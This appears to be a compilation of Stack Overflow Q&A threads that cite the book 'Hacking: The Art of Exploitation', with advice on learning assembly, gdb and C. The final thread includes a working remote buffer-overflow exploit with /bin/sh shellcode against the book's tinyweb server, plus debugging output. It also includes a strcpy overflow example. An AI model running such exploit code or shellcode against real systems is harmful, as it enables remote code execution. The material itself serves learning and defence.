Hacking, 2nd Edition

Jon Erickson

Mentioned 16

An introduction to hacking that describes the techniques of computer hacking, covering topics such as stack-based overflows, format string exploits, network security, cryptographic attacks, and shellcode.


Mentioned in questions and answers.

I decided to learn assembly language. The main reason is to be able to understand disassembled code, and maybe to write more efficient parts of code (for example, through C++) and do things like code caves. I saw there are a zillion different flavors of assembly, so, for the purposes I mention, how should I start? What kind of assembly should I learn? I want to learn by first writing some easy programs (e.g. a calculator), but the real goal is to get accustomed to it so I can understand the code shown, for example, by IDA Pro.

I'm using Windows (if that makes any difference).

Edit: So, it seems everyone is pointing towards MASM. I get the point that it has high-level capabilities, which are all good for the assembly programmer, but that's not what I'm looking for. It seems to have directives like if and invoke that don't show up in popular disassemblers (like IDA). So what I'd like to hear, if possible, is the opinion of anyone who uses ASM for the purpose I'm asking about (reading disassembled EXE code in IDA), not just "general" assembly programmers.

Edit: OK. I am already learning assembly. I am learning MASM, without the high-level stuff that doesn't matter to me. Right now I'm trying out my code in __asm blocks in C++, so I can try things out much faster than if I had to do everything from scratch with MASM.

Are you doing other dev work on Windows? On which IDE? If it's VS, then there's no need for an additional tool just to read disassembled code. Debug your app (or attach to an external app), then open the disassembly window (Alt+8 in the default settings). Step through and watch memory and registers as you would with normal code. You might also want to keep a registers window open (Alt+5 by default).

Intel provides free manuals that give both a survey of the basic architecture (registers, processor units, etc.) and a full instruction reference. As the architecture matures and grows more complex, the 'basic architecture' manuals become less and less readable. If you can get your hands on an older version, you'd probably have a better place to start: even the P3 manuals explain the same basic execution environment better.

If you care to invest in a book, here is a nice introductory text. Search Amazon for 'x86' and you'll find many others. You can also find other directions in another question here.

Finally, you can benefit quite a bit from reading some low-level blogs. These byte-size info bits work best for me, personally.

To do what you want to do, I took the Intel Instruction Set Reference (it might not be the exact one I used, but it looks sufficient) and some simple programs I wrote in Visual Studio, and started throwing them into IDA Pro/WinDbg. When I outgrew my own programs, the software at crackmes was helpful.

I'm assuming that you have some basic understanding of how programs execute on Windows. But really, for reading assembly, there are only a few instructions to learn and a few flavors of each. For example, there's a jump instruction, and it has flavors like jump-if-equal and jump-if-ecx-is-zero. Once you learn the basic instructions, it's pretty simple to get the gist of the program's execution. IDA's graph view helps. If you're tracing the program with WinDbg and you're not sure what an instruction does, it's pretty simple to figure it out.

After a bit of playing like that, I bought Hacker Disassembly Uncovered. Generally, I stay away from books with the word "Hacker" in the title, but I really liked how this one went really in-depth about how compiled code looked disassembled. He also goes into compiler optimizations and some efficiency stuff that was interesting.

It all really depends on how deeply you want to be able to understand the program, too. If you're reverse engineering a target looking for vulnerabilities, if you're writing exploit code, or analyzing packed malware for capabilities, you'll need more of a ramp-up time to really get things going (especially for the more advanced malware). On the other hand, if you just want to be able to change your character's level on your favorite video game, you should be doing fine in a relatively short amount of time.

I found Hacking: The Art of Exploitation to be an interesting and useful way into this topic... can't say that I have ever used the knowledge directly, but that's really not why I read it. It gives you a much richer appreciation of the instructions that your code compiles to, which has occasionally been useful in understanding subtler bugs.

Don't be put off by the title. Most of the first part of the book is "hacking" in the Eric Raymond sense of the word: creative, surprising, almost sneaky ways to solve tough problems. I was (and maybe you are) a lot less interested in the security aspects.

(I don't know about you, but I was excited about assembly.)

A simple tool for experimenting with assembly is already installed on your PC.

Go to Start menu->Run, and type debug

debug (command)

debug is a command in DOS, MS-DOS, OS/2 and Microsoft Windows (only x86 versions, not x64) which runs the program debug.exe (or DEBUG.COM in older versions of DOS). Debug can act as an assembler, disassembler, or hex dump program allowing users to interactively examine memory contents (in assembly language, hexadecimal or ASCII), make changes, and selectively execute COM, EXE and other file types. It also has several subcommands which are used to access specific disk sectors, I/O ports and memory addresses. MS-DOS Debug runs at a 16-bit process level and therefore it is limited to 16-bit computer programs. FreeDOS Debug has a "DEBUGX" version supporting 32-bit DPMI programs as well.

If you want to understand the code you see in IDA Pro (or OllyDbg), you'll need to learn how compiled code is structured. I recommend the book Reversing: Secrets of Reverse Engineering.

I experimented with debug for a couple of weeks when I started learning assembly (15 years ago).
Note that debug works at the bare machine level; there are no high-level assembly commands.

And now a simple example:

Type a to start entering assembly code, type the program below, and finally type g to run it.



(When the AH register is set to 2, INT 21 displays on screen the ASCII character stored in the DL register. INT 20 terminates the program.)

There's always skepticism from non-programmers when honest developers learn the techniques of black hat hackers. Obviously though, we need to learn many of their tricks so we can keep our own security up to par.

To what extent do you think an honest programmer needs to know the methods of malicious programmers?

Definitely learn the dark side. Even if you don't learn the actual techniques, at least make the effort to learn what's possible.


Good resources to learn the tricks of the trade are Reversing: Secrets of Reverse Engineering and Hacking: The Art of Exploitation. They're written for both sides - these could be used to LEARN how to hack, but they also give ways to prevent these kinds of attacks.

I have heard about a buffer overflow and I would like to know how to cause one.

Can someone show me a small buffer overflow example? (And what are they used for?)

The "classic" buffer overflow example is:

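#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[10];
    if (argc < 2)
        return 1;
    strcpy(buffer, argv[1]);  /* no length check: more than 9 chars overflows buffer */
    return 0;
}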

That lets you play with the buffer overflow parameters and tweak them to your heart's content. The book "Hacking - The Art of Exploitation" goes into great detail about how to play around with buffer overflows (purely as an intellectual exercise, obviously).

I've read and finished both Reversing: Secrets of Reverse Engineering and Hacking: The Art of Exploitation. They both were illuminating in their own way but I still feel like a lot of the techniques and information presented within them is outdated to some degree.

When the infamous Phrack article "Smashing the Stack for Fun and Profit" was written in 1996, it was just before what I consider the computer security "golden age".

Writing exploits in the years that followed was relatively easy. Some basic knowledge of C and assembly was all that was required to perform buffer overflows and execute arbitrary shellcode on a victim's machine.

To put it lightly, things have gotten a lot more complicated. Now security engineers have to contend with things like Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP), Stack Cookies, Heap Cookies, and much more. The complexity of writing exploits went up at least an order of magnitude.

You can't even run most of the buffer overrun exploits in the tutorials you'll find today without compiling with a bunch of flags that turn off modern protections.

Now, if you want to write an exploit, you have to devise ways to turn off DEP, spray the heap with your shellcode hundreds of times, and attempt to guess a random memory location near your shellcode. Not to mention the pervasiveness of managed languages in use today, which are much more secure when it comes to these vulnerabilities.

I'm looking to extend my security knowledge beyond writing toy exploits for a decade-old system. I'm having trouble locating resources that address writing exploits in the face of all the protections I outlined above.

What are the more advanced and prevalent papers, books or other resources devoted to contending with the challenges of writing exploits for modern systems?

I'm currently a freshman in college, majoring in CS. I'm just about done with my "Intro to Computer Programming" class. I like it and feel like I'm learning a good bit.

A couple of days ago, I read Joel's "The Perils of JavaSchools". "A linked list?" I thought, "those aren't even hard. We've done a bunch of those already in the class I'm in right now." That's correct, because in Java they're not that hard. But anyway, I tried writing one in C.

And it is SO HARD!

Joel was right, I think ... Java deals with so many little itsy-bitsy things for you that it's really not that hard. But I'm determined to overcome my school's Java-tude and learn how to write this dang linked list in C.

So instead of asking lots and lots of tiny questions, I'm asking: does anyone know of a good (and free) online tutorial for learning C? Specifically, I want to learn how to deal with pointers and all those symbols (&, *, **, []) and how they work together. I'd like to think I'm already pretty proficient in Java, so I don't need tutorials on how to write a "Hello, World!" program. But I'm definitely not ready for anything super-advanced in C or C++, because all I know is Java.

Any help appreciated!

There are numerous guides across the internet for learning pointers. Here's one: http://pweb.netcom.com/~tjensen/ptr/pointers.htm which I've used.

I'm also going to suggest this book to you: Hacking, the Art of Exploitation 2nd Ed.

This book will not make you a "hacker". Nothing but lots of reverse engineering, studying binary code, trial and error, etc. is going to do that. It does, however, introduce you to how to start doing these things, and that comes down to a fundamental understanding of how C works, including pointers. Its introduction to assembly and C is one of the best I've seen. It runs you through several C examples and shows how to investigate what's going on with gdb, a command-line debugger, so you can see the C and the assembly side by side. This includes a fundamental understanding of what pointers are.

This book will as a side-effect give you an introduction to the stack and the heap, data structures etc. In short, reading the intro sections will give you a lot of benefit for the rest of your course.

I am reading a book about hacking and it has a chapter about assembly.

Following is my tiny program written in C.

#include <stdio.h>

int main(int argc, char const *argv[])
{
    int i;

    for (i = 0; i < 10; i++) {
        puts("Hello World!");
    }

    return 0;
}

And here is the gdb session:

(gdb) break main
Breakpoint 1 at 0x40050f: file main.c, line 7.
(gdb) run
Breakpoint 1, main (argc=1, argv=0x7fffffffe708) at main.c:7
7       for (i = 0; i < 10; i++) {
(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000400500 <+0>: push   rbp
   0x0000000000400501 <+1>: mov    rbp,rsp
   0x0000000000400504 <+4>: sub    rsp,0x20
   0x0000000000400508 <+8>: mov    DWORD PTR [rbp-0x14],edi
   0x000000000040050b <+11>:    mov    QWORD PTR [rbp-0x20],rsi
=> 0x000000000040050f <+15>:    mov    DWORD PTR [rbp-0x4],0x0
   0x0000000000400516 <+22>:    jmp    0x400526 <main+38>
   0x0000000000400518 <+24>:    mov    edi,0x4005c4
   0x000000000040051d <+29>:    call   0x4003e0 <puts@plt>
   0x0000000000400522 <+34>:    add    DWORD PTR [rbp-0x4],0x1
   0x0000000000400526 <+38>:    cmp    DWORD PTR [rbp-0x4],0x9
   0x000000000040052a <+42>:    jle    0x400518 <main+24>
   0x000000000040052c <+44>:    mov    eax,0x0
   0x0000000000400531 <+49>:    leave  
   0x0000000000400532 <+50>:    ret    
End of assembler dump.

The following part is what I don't understand. Note that $rip is the "instruction pointer" and points to 0x000000000040050f <+15>.

(gdb) x/x $rip
0x40050f <main+15>: 0x00fc45c7
(gdb) x/12x $rip
0x40050f <main+15>: 0x00fc45c7  0xeb000000  0x05c4bf0e  0xbee80040
0x40051f <main+31>: 0x83fffffe  0x8301fc45  0x7e09fc7d  0x0000b8ec
0x40052f <main+47>: 0xc3c90000  0x1f0f2e66  0x00000084  0x1f0f0000
(gdb) x/8xb $rip
0x40050f <main+15>: 0xc7    0x45    0xfc    0x00    0x00    0x00    0x00    0xeb
(gdb) x/8xh $rip
0x40050f <main+15>: 0x45c7  0x00fc  0x0000  0xeb00  0xbf0e  0x05c4  0x0040  0xbee8
(gdb) x/8xw $rip
0x40050f <main+15>: 0x00fc45c7  0xeb000000  0x05c4bf0e  0xbee80040
0x40051f <main+31>: 0x83fffffe  0x8301fc45  0x7e09fc7d  0x0000b8ec

The first command, x/x $rip, outputs 0x40050f <main+15>: 0x00fc45c7.

Is it the instruction at 0x40050f? Is 0x00fc45c7 same as mov DWORD PTR [rbp-0x4],0x0 (assembled instruction at 0x40050f)?

Secondly, if it is the instruction, what are those hex numbers from the output of commands x/12x $rip, x/8xw $rip, x/8xh $rip?

As to (1), you got that correct.

As to (2), the x command has up to 3 specifiers: how many objects to print; in which format; and what object size. In all your examples you choose to print as hex (x). As to the first specifier, you ask to print 12, 8, 8 objects.

As to the last specifier in your cases:
x/12x has none, so gdb falls back on its default unit size. That default is initially w, i.e. 4-byte chunks. gdb calls these words, while Intel x86 terminology calls them double words. Each size you specify explicitly also becomes the new default for later x commands. Because these terms are defined differently in different places, I'd generally specify exactly what you want rather than relying on the defaults.

x/8xw does the same, for 8 objects, as you explicitly requested dwords now.

x/8xh requests half-word chunks, so the objects are printed 2 bytes at a time. You may wonder why concatenating two neighboring values does not give what was reported when you printed 4-byte words. That's because x86 is a little-endian architecture: the byte at the lowest address is the least significant. Erickson's book explains this well too; a few pages ahead, he does some calculations you might find helpful. In a nutshell, if you recombine the halfwords in swapped order, (2,1), (4,3), ..., you'll see they match. For example, 0x45c7 and 0x00fc become 0x00fc45c7.

I've been working on a buffer overflow from Jon Erickson's Art of Exploitation for a few days now, and I don't understand why I'm getting a segmentation fault. As far as I can tell, the return address is being overwritten properly with an address in the NOP sled, but the program throws a segmentation fault every time it reaches the return instruction at the end of the stack frame.

The vulnerable part of the code is the line length = recv_line(sockfd, request);, because the size of the request buffer is never checked. The entire function, taken from the tinyweb program, follows:

void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {
    unsigned char *ptr, request[500], resource[500];
    int fd, length;

    printf("[DEBUG] hc:1 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);
    length = recv_line(sockfd, request);  /* vulnerable: nothing limits how much is written into request */
    printf("[DEBUG] hc:2 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);

    printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
    printf("[DEBUG] hc:3 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);

    ptr = strstr(request, " HTTP/");
    if(ptr == NULL){
        printf(" NOT HTTP!\n");
    } else {
        *ptr = 0;
        ptr = NULL;
        if(strncmp(request, "GET ", 4) == 0)
            ptr = request + 4;
        if(strncmp(request, "HEAD ", 5) == 0)
            ptr = request + 5;

        if(ptr == NULL){
            printf("\tUNKNOWN REQUEST!");
        }
        else {
            if(ptr[strlen(ptr) - 1] == '/')
                strcat(ptr, "index.html");
            strcpy(resource, WEBROOT);
            strcat(resource, ptr);
            fd = open(resource, O_RDONLY, 0);
            printf("\tOpening \'%s\'\t", resource);
            if(fd == -1){
                printf(" 404 Not Found\n");
                send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n");
                send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
                send_string(sockfd, "<html><head><title>404 Not Found</title></head>");
                send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n");
            }
            else{
                printf(" 200 OK\n");
                send_string(sockfd, "HTTP/1.0 200 OK\r\n");
                send_string(sockfd, "Server: Tiny webserver\r\n\r\n");
                if(ptr == request + 4){
                    if( (length = get_file_size(fd)) == -1)
                        fatal("getting resource file size");
                    if( (ptr = (unsigned char *) malloc(length)) == NULL)
                        fatal("allocating memory for reading resource");
                    read(fd, ptr, length);
                    send(sockfd, ptr, length, 0);
                    free(ptr);
                }
                close(fd);
            }
        }
    }
    printf("Shutting down socket.\n");
    shutdown(sockfd, SHUT_RDWR);
    printf("[DEBUG] hc:4 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);
}
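The root cause is the unbounded recv_line() call. It keeps copying bytes into request until it sees "\r\n", however many arrive. Below is a minimal sketch of a bounded alternative that reads one byte at a time with recv(). recv_line_bounded is a hypothetical name, not part of hacking-network.h. It stores at most size bytes, turns the '\r' of the "\r\n" terminator into the NUL, and rejects any line that doesn't fit instead of writing past the buffer.

```c
#include <sys/types.h>
#include <sys/socket.h>

/* Hypothetical bounded line reader. Reads from sockfd until "\r\n" and
   stores the line (without "\r\n") NUL-terminated in dest, never writing
   more than size bytes. Returns the line length, or -1 on error, EOF,
   or a line too long for dest (dest contents are then unspecified). */
static ssize_t recv_line_bounded(int sockfd, unsigned char *dest, size_t size)
{
    size_t len = 0;              /* bytes stored in dest so far */
    unsigned char c;

    for (;;) {
        if (recv(sockfd, &c, 1, 0) != 1)
            return -1;                       /* error or peer closed */
        if (c == '\n' && len > 0 && dest[len - 1] == '\r') {
            dest[len - 1] = '\0';            /* the '\r' slot becomes the NUL */
            return (ssize_t)(len - 1);
        }
        if (len >= size)
            return -1;                       /* dest is full: reject, don't overflow */
        dest[len++] = c;
    }
}
```

In handle_connection, the call would become recv_line_bounded(sockfd, request, sizeof request), and a -1 return should end the connection.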

The exploit code follows:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#include "hacking.h"
#include "hacking-network.h"

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

#define OFFSET 524
#define RETADDR 0xbfdaf708

int main(int argc, char *argv[]){
int i, sockfd, buflen; //, count;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[600];

if(argc < 2){
    printf("Usage: %s <hostname>\n", argv[0]);
    exit(1);
}

if((host_info = gethostbyname(argv[1])) == NULL)
    fatal("looking up hostname");

if((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
    fatal("in socket");

//count = atoi(argv[2]);
    //printf("Count: %d\n", count);
target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(81);
target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);
memset(&(target_addr.sin_zero), '\0', 8);

if(connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
    fatal("connecting to target server");

bzero(buffer, 600); 
memset(buffer, '\x90', OFFSET);
*((u_int *)(buffer + OFFSET)) = RETADDR;
memcpy(buffer+300, shellcode, strlen(shellcode));
strcat(buffer, "\r\n"); 
printf("Exploit  buffer:\n");
dump(buffer, strlen(buffer));
send_string(sockfd, buffer);

exit(0);
}

Here is the information from GDB:

:~/programs/c/exec$ ps aux | grep tinyweb
         2747  0.1  2.3  97432 48012 pts/1    Sl   Dec15   2:37 gedit tinyweb_exploit.c
root     12444  0.0  0.0   1688   248 pts/2    S+   18:32   0:00 ./tinyweb
         12456  0.0  0.0   4012   768 pts/0    S+   18:33   0:00 grep --color=auto tinyweb
:~/programs/c/exec$ sudo gdb -q --pid=12444 --symbols=./tinyweb

warning: not using untrusted file "/home/sam/.gdbinit"
Reading symbols from /home/sam/programs/c/exec/tinyweb...done.
Attaching to process 12444
Load new symbol table from "/home/sam/programs/c/exec/tinyweb"? (y or n) y
Reading symbols from /home/sam/programs/c/exec/tinyweb...done.
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0x001c3416 in __kernel_vsyscall ()
(gdb) break 74
Breakpoint 1 at 0x8048e8c: file ../code/tinyweb.c, line 74.
(gdb) c
Continuing.

Breakpoint 1, handle_connection (sockfd=4, client_addr_ptr=0xbfcee1e4) at ../code/tinyweb.c:74
74      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), 
    ntohs(client_addr_ptr->sin_port), request);
(gdb) x/16xw request + 500
0xbfcee1a4: 0x0099bad0  0x00aad4e0  0x0000000f  0xbfcee1c4
0xbfcee1b4: 0x00aacff4  0xbfcee218  0x08048e2f  0x00000004
0xbfcee1c4: 0xbfcee1e4  0x00000004  0xbfcee204  0x00000004
0xbfcee1d4: 0x0804aff4  0xbfcee1e8  0x08048658  0x00000010
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbfcee1e4) at ../code/tinyweb.c:74
#1  0x08048e2f in main () at ../code/tinyweb.c:60
(gdb) x/x request
0xbfcedfb0: 0x20544547
(gdb) p /x 0xbfcee1b4 + 8
$5 = 0xbfcee1bc
(gdb) p $5 - 0xbfcedfb0
$6 = 524
(gdb) p /x 0xbfcedfb0 + 200
$7 = 0xbfcee078
(gdb) c
Continuing.

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbfcee1e4) at ../code/tinyweb.c:74
74      printf("Request %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), 
ntohs(client_addr_ptr->sin_port), request);
(gdb) x/150xw request
0xbfcedfb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedfc0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedfd0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedfe0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcedff0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee000: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee010: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee020: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee030: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee040: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee050: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee060: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee070: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee080: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee090: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0a0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0b0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0c0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee0d0: 0x90909090  0x90909090  0x90909090  0xdb31c031
0xbfcee0e0: 0xb099c931  0x6a80cda4  0x6851580b  0x68732f2f
0xbfcee0f0: 0x69622f68  0x51e3896e  0x8953e289  0x9080cde1
0xbfcee100: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee110: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee120: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee130: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee140: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee150: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee160: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee170: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee180: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee190: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfcee1a0: 0x90909090  0x90909090  0x90909090  0x00000211
0xbfcee1b0: 0x90909090  0x90909090  0x90909090  0xbfcee078
0xbfcee1c0: 0x0000000d  0xbfcee1e4  0x00000005  0xbfcee204
0xbfcee1d0: 0x00000004  0x0804aff4  0xbfcee1e8  0x08048658
0xbfcee1e0: 0x00000010  0xd4920002  0x0100007f  0x00000000
0xbfcee1f0: 0x00000000  0x51000002  0x00000000  0x00000000
0xbfcee200: 0x00000000  0x00000001
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x080491b1 in handle_connection (sockfd=Cannot access memory at address 0x90909098
) at ../code/tinyweb.c:125
125 }
(gdb) i r eip
eip            0x80491b1    0x80491b1 <handle_connection+893>
(gdb) x/i 0x080491b1
=> 0x80491b1 <handle_connection+893>:   ret    

The tinyweb program is started, and GDB is then attached to it. A breakpoint is set to find where the buffer is located in memory (request @ 0xbfcedfb0). bt shows the current return address and its location: the return address 0x08048e2f is stored at 0xbfcee1bc. That location is 524 bytes past the start of the buffer. The exploit uses a return address 200 bytes into the buffer and places the shellcode 300 bytes in.

After the exploit is run, examining the buffer shows the NOP sled and the shellcode. The slot at 0xbfcee1bc, which originally held 0x08048e2f, now contains 0xbfcee078, an address inside the buffer that points to a NOP. However, when the program is continued, it throws a segmentation fault. Examining the instruction pointer after the fault shows that it points into handle_connection, at its ret instruction.

Why does it throw a segmentation fault at the return instruction when there is a valid memory address there for it to return to?

Edit 1

I'm embarrassed I didn't notice that shellcode bit earlier. Then again, I haven't gotten the earlier exploits to work yet either, courtesy of ASLR, so I never looked that closely at the shellcode. Anyway, here is what I changed it to:

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x89\xe3\x51\x89\xe2\x53\x89\xe1"
"\xcd\x80";

............1.1.1......j.XQh//bin/sh..Q..S.....

Unfortunately, I'm still seeing the same issue. I've included some more GDB output below. As best I can tell, the sockfd variable somehow gets screwed up when the RET executes, yet the DEBUG prints show that sockfd doesn't change. I've tried stepping through the instructions at the end to see what's going on, but that hasn't revealed much.

[DEBUG] hc:3 sockfd is at bfefcae0 and contains 0x0000000d
 NOT HTTP!
 Shutting down socket.
[DEBUG] hc:4 sockfd is at bfefcae0 and contains 0x0000000d
Segmentation fault (core dumped)



(gdb) list 120
115                     send(sockfd, ptr, length, 0);
116                     free(ptr);
117                 }
118                 close(fd);
119             }
120         }
121     }
122     printf("Shutting down socket.\n");
123     shutdown(sockfd, SHUT_RDWR);
124     printf("[DEBUG] hc:4 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd); 
125 }
126 
127 int get_file_size(int fd){
128     struct stat stat_struct;
129     
130     if(fstat(fd, &stat_struct) == -1)
131         return -1;
132     return (int) stat_struct.st_size;
133 }
134     
(gdb) break 74
Breakpoint 1 at 0x8048e8c: file ../code/tinyweb.c, line 74.
(gdb) break 120
Breakpoint 2 at 0x804916f: file ../code/tinyweb.c, line 120.

Breakpoint 2, handle_connection (sockfd=13, client_addr_ptr=0xbfefcb04) at ../code/tinyweb.c:122
122     printf("Shutting down socket.\n");
(gdb) x/170xw request
0xbfefc8d0: 0x90909090  0x90909090  0x90909090  0x90909090
....Output Trimmed....
0xbfefc990: 0x90909090  0x90909090  0x90909090  0x90909090
                                    ^  
...Output Trimmed....               |________________________RET address location in NOP sled

0xbfefc9f0: 0x90909090  0x90909090  0x90909090  0xdb31c031
0xbfefca00: 0xb099c931  0x6a80cda4  0x6851580b  0x69622f2f
0xbfefca10: 0x68732f6e  0x8951e389  0xe18953e2  0x909080cd
0xbfefca20: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca30: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca40: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca50: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca60: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca70: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca80: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefca90: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefcaa0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefcab0: 0x90909090  0x90909090  0x90909090  0x90909090
0xbfefcac0: 0x90909090  0x00000000  0x90909090  0x00000211

0xbfefcad0: 0x90909090  0x90909090  0x90909090  0xbfefc998<= RET address

0xbfefcae0: 0x0000000d  0xbfefcb04  0x00000006  0xbfefcb24
0xbfefcaf0: 0x00000004  0x0804aff4  0xbfefcb08  0x08048658
0xbfefcb00: 0x00000010  0xd9a40002  0x0100007f  0x00000000
0xbfefcb10: 0x00000000  0x51000002  0x00000000  0x00000000
0xbfefcb20: 0x00000000  0x00000001  0x00000006  0x00000003
0xbfefcb30: 0x080491f0  0x00000000  0xbfefcbb8  0x00126ce7
0xbfefcb40: 0x00000001  0xbfefcbe4  0xbfefcbec  0xb7810848
0xbfefcb50: 0xbfefcc4c  0xffffffff  0x00b0dff4  0x08048497
0xbfefcb60: 0x00000001  0xbfefcba0  0x00aff136  0x00b0ead0
0xbfefcb70: 0xb7810b28  0x00268ff4

(gdb) bt
#0  handle_connection (sockfd=13, client_addr_ptr=0xbfefcb04) at ../code/tinyweb.c:122
#1  0xbfefc998 in ?? ()
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

(gdb) x/20i $eip
=> 0x804916f <handle_connection+827>:   movl   $0x804985b,(%esp)
   0x8049176 <handle_connection+834>:   call   0x804880c <puts@plt>
   0x804917b <handle_connection+839>:   mov    0x8(%ebp),%eax
   0x804917e <handle_connection+842>:   movl   $0x2,0x4(%esp)
   0x8049186 <handle_connection+850>:   mov    %eax,(%esp)
   0x8049189 <handle_connection+853>:   call   0x804868c <shutdown@plt>
   0x804918e <handle_connection+858>:   mov    0x8(%ebp),%edx
   0x8049191 <handle_connection+861>:   mov    $0x8049874,%eax
   0x8049196 <handle_connection+866>:   mov    %edx,0x8(%esp)
   0x804919a <handle_connection+870>:   lea    0x8(%ebp),%edx
   0x804919d <handle_connection+873>:   mov    %edx,0x4(%esp)
   0x80491a1 <handle_connection+877>:   mov    %eax,(%esp)
   0x80491a4 <handle_connection+880>:   call   0x804878c <printf@plt>
   0x80491a9 <handle_connection+885>:   add    $0x414,%esp
   0x80491af <handle_connection+891>:   pop    %ebx
   0x80491b0 <handle_connection+892>:   pop    %ebp
   0x80491b1 <handle_connection+893>:   ret    
   0x80491b2 <get_file_size>:   push   %ebp
   0x80491b3 <get_file_size+1>: mov    %esp,%ebp
   0x80491b5 <get_file_size+3>: sub    $0x78,%esp
(gdb) s
123     shutdown(sockfd, SHUT_RDWR);
(gdb) x/x &sockfd
0xbfefcae0: 0x0000000d
(gdb) s
124     printf("[DEBUG] hc:4 sockfd is at %08x and contains 0x%08x\n", &sockfd, sockfd);
(gdb) i r eip
eip            0x804918e    0x804918e <handle_connection+858>
(gdb) s
125 }
(gdb) x/10i $eip
=> 0x80491a9 <handle_connection+885>:   add    $0x414,%esp
   0x80491af <handle_connection+891>:   pop    %ebx
   0x80491b0 <handle_connection+892>:   pop    %ebp
   0x80491b1 <handle_connection+893>:   ret    
   0x80491b2 <get_file_size>:   push   %ebp
   0x80491b3 <get_file_size+1>: mov    %esp,%ebp
   0x80491b5 <get_file_size+3>: sub    $0x78,%esp
   0x80491b8 <get_file_size+6>: lea    -0x60(%ebp),%eax
   0x80491bb <get_file_size+9>: mov    %eax,0x4(%esp)
   0x80491bf <get_file_size+13>:    mov    0x8(%ebp),%eax
(gdb) si
0x080491af  125 }
(gdb) i r eip
eip            0x80491af    0x80491af <handle_connection+891>
(gdb) si
0x080491b0  125 }
(gdb) i r eip
eip            0x80491b0    0x80491b0 <handle_connection+892>
(gdb) info registers
eax            0x3b 59
ecx            0xbfefc6a8   -1074805080
edx            0x26a360 2532192
ebx            0x90909090   -1869574000
esp            0xbfefcad8   0xbfefcad8
ebp            0xbfefcad8   0xbfefcad8
esi            0x0  0
edi            0x0  0
eip            0x80491b0    0x80491b0 <handle_connection+892>
eflags         0x200286 [ PF SF IF ID ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
(gdb) si
0x080491b1 in handle_connection (sockfd=Cannot access memory at address 0x90909098
) at ../code/tinyweb.c:125
125 }
(gdb) x/x sockfd
Cannot access memory at address 0x90909098
(gdb) x/x &sockfd
0x90909098: Cannot access memory at address 0x90909098

Any thoughts as to what's going on?

